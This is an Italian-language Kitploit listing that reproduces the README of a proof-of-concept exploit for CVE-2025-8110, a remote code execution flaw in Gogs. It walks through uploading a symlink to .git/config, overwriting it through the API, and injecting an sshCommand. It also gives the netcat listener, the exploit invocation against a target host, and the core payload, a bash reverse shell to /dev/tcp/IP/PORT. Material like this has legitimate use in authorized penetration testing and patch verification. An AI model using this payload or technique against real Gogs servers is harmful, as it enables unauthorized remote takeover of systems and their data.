Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-8110 — Exploit proof-of-concept per CVE-2025-8110, una vulnerabilità RCE in Gogs che sfrutta l'attraversamento di percorso tramite link simbolici e l'iniezione di sshCommand per fornire una reverse shell. | Kitploit
Strumenti/GitHubGitHub/ghxstsec/cve-2025-8110
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed TeamingSviluppo Payload
GitHubghxstsec/cve-2025-8110

CVE-2025-8110

Exploit proof-of-concept per CVE-2025-8110, una vulnerabilità RCE in Gogs che sfrutta l'attraversamento di percorso tramite link simbolici e l'iniezione di sshCommand per fornire una reverse shell.

Vedi Repository
534 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Exploit RCE di Gogs (CVE-2025-8110)

Python License Expertise

Un Proof of Concept (PoC) per CVE-2025-8110, una vulnerabilità critica in Gogs che permette l'esecuzione remota di codice (RCE) tramite manipolazione di .git/config usando bypass di link simbolici e iniezione di sshCommand.

📖 Panoramica

Questo exploit sfrutta una falla di Path Traversal nella gestione dei contenuti dell'API di Gogs. Un utente autenticato può:

  1. Creare un repository e caricare un link simbolico che punta al file .git/config interno.
  2. Usare l'API per sovrascrivere il file di configurazione target tramite il symlink.
  3. Iniettare un sshCommand malevolo per eseguire una Reverse Shell quando il server esegue operazioni Git.

🚀 Caratteristiche

  • Flusso di lavoro automatico: Gestisce login, creazione del repository, deploy del symlink e poisoning.
  • Codifica robusta: Codifica automaticamente le credenziali in URL per gestire caratteri speciali (es. !, @).
  • Output ricco: Logging ad alta visibilità utilizzando la libreria Rich.

🛠 Prerequisiti

  • Python 3.12+
  • Git installato sul sistema locale.
  • Credenziali valide sull'istanza Gogs target.

📦 Installazione

  1. Clona il repository:
    root@kitploit:~
    git clone https://github.com/Ghxstsec/CVE-2025-8110.git
    cd CVE-2025-8110
    

Installa le dipendenze:

root@kitploit:~
pip3 install -r requirements.txt

💻 Utilizzo

Avvia il listener:

root@kitploit:~
nc -lvnp 6666

Esegui l'exploit:

root@kitploit:~
python3 CVE-2025-8110-RCE.py -u [http://target-gogs.htb:3000](http://target-gogs.htb:3000) -lh <YOUR_IP> -lp 6666 -p 'YourPassword123!'

Argomenti:

Nucleo della vulnerabilità:

sshCommand = bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1' #

Quando Gogs esegue un comando Git che richiede trasporto di rete (come una sincronizzazione mirror o un controllo di riferimento interno), invoca sshCommand, attivando la reverse shell.

⚠️ Disclaimer legale: Questo strumento è solo per scopi educativi e di test di sicurezza autorizzati. L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo script. L'accesso non autorizzato a sistemi informatici è illegale.

Scarica lo strumento
ArgomentoDescrizione
-u, --urlURL base dell'istanza Gogs target (es. http://target.htb:3000).
-lh, --hostIP dell'attaccante (LHOST) a cui la reverse shell si connetterà.
-lp, --portPorta di ascolto (LPORT) configurata sulla tua macchina.
-p, --passwordPassword per l'account pwnuser per eseguire l'autenticazione.
-x, --proxy(Opzionale) Instrada il traffico attraverso un proxy locale (default: http://localhost:8080).